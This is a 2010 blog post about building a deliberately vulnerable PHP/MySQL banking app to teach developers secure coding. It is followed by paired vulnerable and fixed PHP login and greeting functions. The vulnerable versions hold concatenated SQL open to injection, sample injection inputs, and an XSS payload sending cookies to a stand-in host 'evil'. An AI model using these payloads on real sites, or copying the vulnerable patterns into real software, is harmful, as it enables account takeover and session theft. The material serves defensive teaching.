Sunday, January 31, 2010

Bad Web Application

So this week I spent time playing around with vulnerable web applications from OWASP and Foundstone. Now I will admit that I only played with these applications for a couple of hours, but it got me thinking about how to use these tools in my job. These tools are great for teaching how to perform web application penetration testing, but they seem to lack a way to fix the identified issues.

One responsibility I have is to work with my development team to write better code. Not being a developer by trade, and hoping to make it interesting for them, I want to take the bad web app idea a step further: I want the developers to write code to fix my bad application. OK, I am going to write code to fix it, but I want to teach them to write that code as well.

The first application is a bad online banking system based on Linux, Apache, MySQL and PHP. I hope to have it completed in the next two months or so. I hope the application will be filled with injection flaws, cross-site scripting issues, and broken authentication and session management issues; these are the top three from the OWASP Top 10 – 2010. Once I have the application “tested” I will post it online for others to use and learn from.
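As an added illustration of what the first two of those flaw classes look like in a PHP/MySQL login, here is a vulnerable login and greeting next to their fixed versions. This is example code written for this page, not code from the author's planned application; the `accounts` table and its columns, the `$pdo` PDO connection, and the `login_*`/`greet_*` function names are all assumed for the illustration.

```php
<?php
// Added example, not part of the original post or the planned bad bank app.
// Assumed schema: table `accounts` with columns id, username, password (plaintext,
// for the vulnerable version) and password_hash (password_hash() output, for the
// fixed version). $pdo is an assumed PDO connection to that MySQL database.

// VULNERABLE: user input is concatenated straight into the SQL string.
// A username of  admin'--  comments out the password check and logs in as admin;
// a username of  ' OR '1'='1  returns the first row in the table.
function login_vulnerable(PDO $pdo, string $username, string $password): ?array
{
    $sql = "SELECT id, username FROM accounts WHERE username = '$username' "
         . "AND password = '$password'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// FIXED: a prepared statement sends the value separately from the statement text,
// so quote characters in $username cannot change the query structure. The password
// is never put in the query at all; it is checked against a stored hash.
function login_fixed(PDO $pdo, string $username, string $password): ?array
{
    $stmt = $pdo->prepare(
        'SELECT id, username, password_hash FROM accounts WHERE username = :u'
    );
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    // Issue a fresh session ID on login so a session ID the attacker planted
    // before authentication (session fixation) is not carried over.
    session_regenerate_id(true);
    $_SESSION['user_id'] = $row['id'];
    unset($row['password_hash']);
    return $row;
}

// VULNERABLE (reflected XSS): the username is echoed back into the HTML unescaped,
// so a value such as  <script>document.location='http://evil/?'+document.cookie</script>
// runs in the victim's browser.
function greet_vulnerable(string $username): string
{
    return "<p>Welcome back, $username</p>";
}

// FIXED: HTML-encode at the point of output. ENT_QUOTES also encodes single quotes,
// which matters if the value is ever placed inside an attribute.
function greet_fixed(string $username): string
{
    return '<p>Welcome back, '
         . htmlspecialchars($username, ENT_QUOTES, 'UTF-8')
         . '</p>';
}
```

The pairing is the teaching format the post is after: each function in the "bad" version is kept, and the developer's job is to produce the second version beside it. The point to stress with the team is that the fix for injection is a change of mechanism (parameterised queries), not input filtering, and that the fix for XSS belongs at output time, in the encoding that matches the context the value lands in.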
